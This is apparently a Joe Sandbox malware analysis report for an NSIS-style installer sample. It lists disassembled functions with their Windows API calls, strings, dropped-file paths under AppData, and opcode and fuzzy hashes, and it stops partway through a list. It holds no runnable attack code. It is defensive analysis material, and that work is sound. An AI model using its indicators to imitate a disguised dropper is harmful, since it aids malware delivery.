                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                                                            • SetBkMode.GDI32(?,?), ref: 00404299
                                                                            • GetSysColor.USER32(?), ref: 004042AC
                                                                            • SetBkColor.GDI32(?,?), ref: 004042BC
                                                                            • DeleteObject.GDI32(?), ref: 004042D6
                                                                            • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                            • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                                                            • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                            • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                                                            Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                              • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                            • String ID: 9
                                                                            • API String ID: 163830602-2366072709
                                                                            • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                            • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                                                            • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                            • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                                                            Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                                                            • GetMessagePos.USER32 ref: 00404B9D
                                                                            • ScreenToClient.USER32(?,?), ref: 00404BB7
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                            • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                            • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                                                            Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401DB6
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                            • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                            • String ID: Times New Roman
                                                                            • API String ID: 3808545654-927190056
                                                                            • Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                                            • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                                                            • Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                                            • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                                                            Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                            • MulDiv.KERNEL32(00019600,00000064,0009E3B0), ref: 00402E20
                                                                            • wsprintfW.USER32 ref: 00402E30
                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 00402E2A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                                            • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                                                            • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                                            • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                                                            Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                                                            • wsprintfW.USER32 ref: 00404B16
                                                                            • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s$6B
                                                                            • API String ID: 3540041739-3884863406
                                                                            • Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                                            • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                                                            • Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                                            • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                                                            Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\investeringsbelbenes\redocking.gal,000000FF,C:\Users\user\AppData\Roaming\kontorarbejders\restbelbenes.dll,00000400,?,?,00000021), ref: 004025E2
                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\kontorarbejders\restbelbenes.dll,?,?,C:\Users\user\investeringsbelbenes\redocking.gal,000000FF,C:\Users\user\AppData\Roaming\kontorarbejders\restbelbenes.dll,00000400,?,?,00000021), ref: 004025ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                            • String ID: C:\Users\user\AppData\Roaming\kontorarbejders\restbelbenes.dll$C:\Users\user\investeringsbelbenes\redocking.gal
                                                                            • API String ID: 3109718747-3099233647
                                                                            • Opcode ID: 7b04a4fba6618d77d657c9c2ab39c2f64db87fe02accc8d7244a3a28dc60ed8f
                                                                            • Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
                                                                            • Opcode Fuzzy Hash: 7b04a4fba6618d77d657c9c2ab39c2f64db87fe02accc8d7244a3a28dc60ed8f
                                                                            • Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
                                                                            Function 0040577F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057C2
                                                                            • GetLastError.KERNEL32 ref: 004057D6
                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                                                            • GetLastError.KERNEL32 ref: 004057F5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 3449924974-3080008178
                                                                            • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                            • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                                                            • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                            • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
                                                                            Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                            • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 6c88db696a2834356160cf22a034812d05f7fa2de6f9a6422368acb1ec934c8d
                                                                            • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                                                            • Opcode Fuzzy Hash: 6c88db696a2834356160cf22a034812d05f7fa2de6f9a6422368acb1ec934c8d
                                                                            • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                                                            Function 00405B1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00405B2D
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-2145255484
                                                                            • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                            • Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
                                                                            • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                            • Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD
                                                                            Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                                            • GetTickCount.KERNEL32 ref: 00402E8E
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                                            • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                                            • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                                                            • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                                            • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                                                            Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405253
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                                                              • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
